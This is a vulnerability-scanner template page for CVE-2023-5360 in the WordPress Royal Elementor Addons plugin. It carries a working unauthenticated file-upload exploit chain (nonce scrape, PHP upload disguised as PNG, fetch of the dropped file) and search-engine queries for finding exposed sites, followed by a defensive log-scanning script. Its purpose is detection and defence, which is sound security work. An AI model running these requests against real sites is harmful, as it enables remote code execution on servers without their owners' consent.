WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload
ID: CVE-2023-5360
Severity: critical
Author: theamanrawat
Tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
Description
Arbitrary File Upload vulnerability in the WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website, including backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79.
YAML Source
id: CVE-2023-5360

info:
  name: WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79
  remediation: Fixed in 1.3.79
  reference:
    - https://wordpress.org/plugins/royal-elementor-addons/
    - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5360
    - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34
    - http://packetstormsecurity.com/files/175992/WordPress-Royal-Elementor-Addons-And-Templates-Remote-Shell-Upload.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5360
    cwe-id: CWE-434
    epss-score: 0.96512
    epss-percentile: 0.99596
    cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 3
    vendor: royal-elementor-addons
    product: royal_elementor_addons
    framework: wordpress
    shodan-query: http.html:/plugins/royal-elementor-addons/
    fofa-query: body=/plugins/royal-elementor-addons/
    publicwww-query: "/plugins/royal-elementor-addons/"
  tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive

variables:
  file: "{{to_lower(rand_text_alpha(5))}}"
  string: "CVE-2023-5360"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236

        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p"
        Content-Type: image/png

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="allowed_file_types"

        ph$p
        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="triggering_event"

        click
        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="wpr_addons_nonce"

        {{nonce}}
        -----------------------------318949277012917151102295043236--
      - |
        GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'

    extractors:
      - type: regex
        name: nonce
        part: body_1
        group: 1
        regex:
          - 'WprConfig\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"'
        internal: true

      - type: regex
        name: filename
        part: body_2
        group: 1
        regex:
          - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php'
        internal: true
# digest: 4a0a0047304502207026345615de71c3a227e64788ecc24047b81c29deb98710c628c5bbba56bb46022100ba470a1ce76efc6758529b7bdc408a5135e67d3a2b743853f723db43a3918c31:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-5360.yaml"
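On the defensive side, the request pair this template sends (a POST to the `wpr_addons_upload_file` action, then a GET for a `.php` file under `wp-content/uploads/wpr-addons/forms/`) can be searched for in web server access logs. The following is an added example, not part of the template or the Nuclei project; it assumes combined-format access logs, and the function name and sample log lines are constructed for illustration.

```python
import re

# Combined log format: ip ident user [time] "METHOD path PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# The AJAX action the template posts to. Only the query-string form is visible
# in access logs; an action sent in the POST body would not be logged.
UPLOAD = re.compile(r'/wp-admin/admin-ajax\.php\?(?:.*&)?action=wpr_addons_upload_file(?:&|$)')
# Script-type files requested from the plugin's form upload directory.
DROPPED = re.compile(
    r'/wp-content/uploads/wpr-addons/forms/[^/?]+\.(?:php\d?|phtml|phar)(?:\?|$)', re.I)

def find_upload_activity(lines):
    """Return (kind, ip, time, path, status) tuples for suspicious requests."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts, method, path, status = m.groups()
        if method == "POST" and UPLOAD.search(path):
            uploaders.add(ip)
            findings.append(("upload_call", ip, ts, path, int(status)))
        elif DROPPED.search(path):
            # A script served from an upload directory is the high-signal event;
            # it is stronger still when the same client just called the action.
            kind = "script_after_upload" if ip in uploaders else "script_in_upload_dir"
            findings.append((kind, ip, ts, path, int(status)))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE = [
    '203.0.113.7 - - [12/Oct/2023:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [12/Oct/2023:10:00:02 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=wpr_addons_upload_file HTTP/1.1" 200 180 "-" "-"',
    '203.0.113.7 - - [12/Oct/2023:10:00:03 +0000] "GET /wp-content/uploads/'
    'wpr-addons/forms/abcde.php HTTP/1.1" 200 32 "-" "-"',
    '198.51.100.4 - - [12/Oct/2023:10:05:00 +0000] "GET /wp-content/uploads/'
    'wpr-addons/forms/report.pdf HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_activity(SAMPLE):
        print(*finding)
```

A `script_after_upload` finding with a 200 status warrants reviewing the contents of the upload directory on disk and confirming the plugin is at 1.3.79 or later.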